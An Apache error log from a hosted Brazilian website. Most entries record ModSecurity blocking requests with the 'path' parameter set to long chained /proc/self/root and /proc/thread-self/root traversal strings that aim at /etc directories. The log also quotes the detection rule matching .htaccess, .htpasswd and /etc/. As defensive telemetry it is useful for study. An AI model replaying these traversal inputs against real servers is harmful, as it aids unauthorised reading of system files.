[Fri Mar 20 02:58:20.956093 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.241.31:49626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzh_PqxLDW4GITHUkSq8QAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:58:31.157771 2026] [proxy_fcgi:error] [pid 31215:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51984] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:59:04.073888 2026] [proxy_fcgi:error] [pid 21219:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53074] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:59:06.604401 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:39688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abziKvu8EFLIOrSqIpvnbQAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:59:25.682840 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:43172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abziPda6ubjKNq_cu4aW-wAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:59:33.103231 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54038] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:59:38.303789 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:58796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abziSvu8EFLIOrSqIpvnggAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:59:52.146232 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:35680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abziWPXLqtnMIWvjpaJgrQAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:00:00.153799 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:54790] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:00:07.956690 2026] [:error] [pid 8307:tid 140411641214720] [client 74.7.241.31:46222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abziZ7-FhjpZGs9ba8qtEgAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:00:31.146200 2026] [proxy_fcgi:error] [pid 30424:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55666] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:00:38.470266 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:58324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzihgF0L0L-SsrnPo4w3QAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:00:50.678262 2026] [:error] [pid 8307:tid 140411691570944] [client 74.7.241.31:33186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzikr-FhjpZGs9ba8qtNAAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:00:57.145785 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56528] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:01:03.209669 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.241.31:33358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzinwF0L0L-SsrnPo4w6wAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:01:19.129778 2026] [proxy_fcgi:error] [pid 21219:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57286] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:01:19.972070 2026] [core:alert] [pid 21219:tid 140411691570944] [client 57.141.18.18:35134] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:01:24.482643 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:32970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzitNa6ubjKNq_cu4aXXAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:01:32.314884 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:51738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzivAkwaGbbGflqUZANdwAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:01:36.194670 2026] [mime_magic:error] [pid 31215:tid 140411658000128] (70014)End of file found: [client 57.141.18.48:35768] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:01:36.750674 2026] [:error] [pid 30424:tid 140411666392832] [client 74.7.241.31:51740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abziwMt36Dv4L1GW-s-gqQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:01:41.033786 2026] [proxy_fcgi:error] [pid 31215:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58114] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:01:47.579196 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:43054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abziy_u8EFLIOrSqIpvnzAAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:01:49.918571 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:39688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzizfu8EFLIOrSqIpvnzwAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:01:50.519264 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:32864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzizta6ubjKNq_cu4aXZgAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:01:53.211945 2026] [:error] [pid 8307:tid 140411582465792] [client 74.7.241.31:32880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi0b-FhjpZGs9ba8qtagAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:01:55.322404 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.241.31:32892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi0wF0L0L-SsrnPo4xFgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:01:58.513581 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:54100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi1hCii7xarUs8iHYskQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:02.233504 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:54104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi2ta6ubjKNq_cu4aXcgAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:03.129796 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58922] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:02:05.979016 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:54116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi3fqxLDW4GITHUkSrsQAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:11.826991 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:52142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] 